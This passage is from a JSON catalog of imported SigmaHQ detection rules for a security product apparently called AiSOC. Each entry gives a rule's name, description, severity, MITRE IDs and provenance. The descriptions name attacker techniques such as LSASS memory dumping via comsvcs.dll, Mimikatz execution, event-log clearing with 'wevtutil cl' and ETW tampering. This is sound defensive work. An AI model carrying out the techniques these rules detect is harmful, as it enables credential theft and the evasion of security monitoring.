"tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587", "T1584" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/program-executions-in-suspicious-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml" } }, { "id": "sigmahq-sigma-a3ab73f1-bd46-4319-8f06-4b20d0617886", "type": "detection", "name": "Windows Defender Exploit Guard Tamper", "description": "Detects when someone is adding or removing applications or folders from exploit guard \"ProtectedFolders\" or \"AllowedApplications\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exploit-guard-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml" } }, { "id": "sigmahq-sigma-a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "type": "detection", "name": "Data Compressed", "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-compressed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_data_compressed.yml" } }, { "id": "sigmahq-sigma-a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", "type": "detection", "name": "Malicious IP Address Sign-In Failure Rate", "description": "Indicates sign-in from a malicious IP address based on high failure rates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-ip-address-sign-in-failure-rate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" } }, { "id": "sigmahq-sigma-a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "type": "detection", "name": "Potential Suspicious Winget Package Installation", "description": "Detects potential suspicious winget package installation from a suspicious source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-winget-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml" } }, { "id": "sigmahq-sigma-a4694263-59a8-4608-a3a0-6f8d3a51664c", "type": "detection", "name": "Suspicious Key Manager Access", "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-key-manager-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml" } }, { "id": "sigmahq-sigma-a46c93b7-55ed-4d27-a41b-c259456c4746", "type": "detection", "name": "Linux Crypto Mining Pool Connections", "description": "Detects process connections to a Monero crypto mining pool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-crypto-mining-pool-connections.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a46c93b7-55ed-4d27-a41b-c259456c4746", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" } }, { "id": "sigmahq-sigma-a4824fca-976f-4964-b334-0621379e84c4", "type": "detection", "name": "Potential File Overwrite Via Sysinternals SDelete", "description": "Detects the use of SDelete to erase a file not the free space", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-file-overwrite-via-sysinternals-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4824fca-976f-4964-b334-0621379e84c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml" } }, { "id": "sigmahq-sigma-a49fa4d5-11db-418c-8473-1e014a8dd462", "type": "detection", "name": "Lsass Memory Dump via Comsvcs DLL", "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-memory-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a49fa4d5-11db-418c-8473-1e014a8dd462", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" } }, { "id": "sigmahq-sigma-a4b25073-8947-489c-a8dd-93b41c23f26d", "type": "detection", "name": "Windows LAPS Credential Dump From Entra ID", "description": "Detects when an account dumps the LAPS password from Entra ID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-laps-credential-dump-from-entra-id.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4b25073-8947-489c-a8dd-93b41c23f26d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml" } }, { "id": "sigmahq-sigma-a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "type": "detection", "name": "ETW Logging Disabled In .NET Processes - Registry", "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-in-net-processes-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" } }, { "id": "sigmahq-sigma-a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "type": "detection", "name": "Unusual Child Process of dns.exe", "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-child-process-of-dns-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml" } }, { "id": "sigmahq-sigma-a537cfc3-4297-4789-92b5-345bfd845ad0", "type": "detection", "name": "Service DACL Abuse To Hide Services Via Sc.EXE", "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-dacl-abuse-to-hide-services-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml" } }, { "id": "sigmahq-sigma-a54f842a-3713-4b45-8c84-5f136fdebd3c", "type": "detection", "name": "New PortProxy Registry Entry Added", "description": "Detects the modification of the PortProxy registry key which is used for port forwarding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-portproxy-registry-entry-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" } }, { "id": "sigmahq-sigma-a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "type": "detection", "name": "Exchange PowerShell Cmdlet History Deleted", "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exchange-powershell-cmdlet-history-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml" } }, { "id": "sigmahq-sigma-a557ffe6-ac54-43d2-ae69-158027082350", "type": "detection", "name": "Huawei BGP Authentication Failures", "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/huawei-bgp-authentication-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a557ffe6-ac54-43d2-ae69-158027082350", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/huawei/bgp/huawei_bgp_auth_failed.yml" } }, { "id": "sigmahq-sigma-a58353df-af43-4753-bad0-cd83ef35eef5", "type": "detection", "name": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-usage-of-active-directory-diagnostic-tool-ntdsutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a58353df-af43-4753-bad0-cd83ef35eef5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml" } }, { "id": "sigmahq-sigma-a5a2d357-1ab8-4675-a967-ef9990a59391", "type": "detection", "name": "LSASS Process Memory Dump Files", "description": "Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-memory-dump-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml" } }, { "id": "sigmahq-sigma-a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" } }, { "id": "sigmahq-sigma-a5a827d9-1bbe-4952-9293-c59d897eb41b", "type": "detection", "name": "Steganography Extract Files with Steghide", "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-extract-files-with-steghide.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5a827d9-1bbe-4952-9293-c59d897eb41b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_steghide_extract_steganography.yml" } }, { "id": "sigmahq-sigma-a5b40a90-baf5-4bf7-a6f7-373494881d22", "type": "detection", "name": "ETW Logging/Processing Option Disabled On IIS Server", "description": "Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-processing-option-disabled-on-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5b40a90-baf5-4bf7-a6f7-373494881d22", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml" } }, { "id": "sigmahq-sigma-a5b977d6-8a81-4475-91b9-49dbfcd941f7", "type": "detection", "name": "Remove Immutable File Attribute - Auditd", "description": "Detects removing immutable file attribute.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-immutable-file-attribute-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_chattr_immutable_removal.yml" } }, { "id": "sigmahq-sigma-a5c7a43f-6009-4a8c-80c5-32abf1c53ecc", "type": "detection", "name": "Microsoft Office Protected View Disabled", "description": "Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-office-protected-view-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5c7a43f-6009-4a8c-80c5-32abf1c53ecc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml" } }, { "id": "sigmahq-sigma-a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "type": "detection", "name": "UAC Bypass With Fake DLL", "description": "Attempts to load dismcore.dll after dropping it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-with-fake-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_uac_bypass_via_dism.yml" } }, { "id": "sigmahq-sigma-a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab", "type": "detection", "name": "AWS EnableRegion Command Monitoring", "description": "Detects the use of the EnableRegion command in AWS CloudTrail logs.\nWhile AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.\nThere may be situations where security monitoring does not cover some new AWS regions.\nMonitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-enableregion-command-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_region_enabled.yml" } }, { "id": "sigmahq-sigma-a607e1fe-74bf-4440-a3ec-b059b9103157", "type": "detection", "name": "AWS SecurityHub Findings Evasion", "description": "Detects the modification of the findings on SecurityHub.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/cloud/aws-securityhub-findings-evasion.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a607e1fe-74bf-4440-a3ec-b059b9103157", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml" } }, { "id": "sigmahq-sigma-a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "type": "detection", "name": "Azure Kubernetes Admission Controller", "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1552", "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-admission-controller.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml" } }, { "id": "sigmahq-sigma-a622fcd2-4b5a-436a-b8a2-a4171161833c", "type": "detection", "name": "Granting Of Permissions To An Account", "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/granting-of-permissions-to-an-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a622fcd2-4b5a-436a-b8a2-a4171161833c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml" } }, { "id": "sigmahq-sigma-a62b37e0-45d3-48d9-a517-90c1a1b0186b", "type": "detection", "name": "Eventlog Cleared", "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml" } }, { "id": "sigmahq-sigma-a6355fbe-f36f-45d8-8efc-ab42465cbc52", "type": "detection", "name": "Delegated Permissions Granted For All Users", "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delegated-permissions-granted-for-all-users.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml" } }, { "id": "sigmahq-sigma-a642964e-bead-4bed-8910-1bb4d63e3b4d", "type": "detection", "name": "HackTool - Mimikatz Execution", "description": "Detection well-known mimikatz command line arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005", "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-mimikatz-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 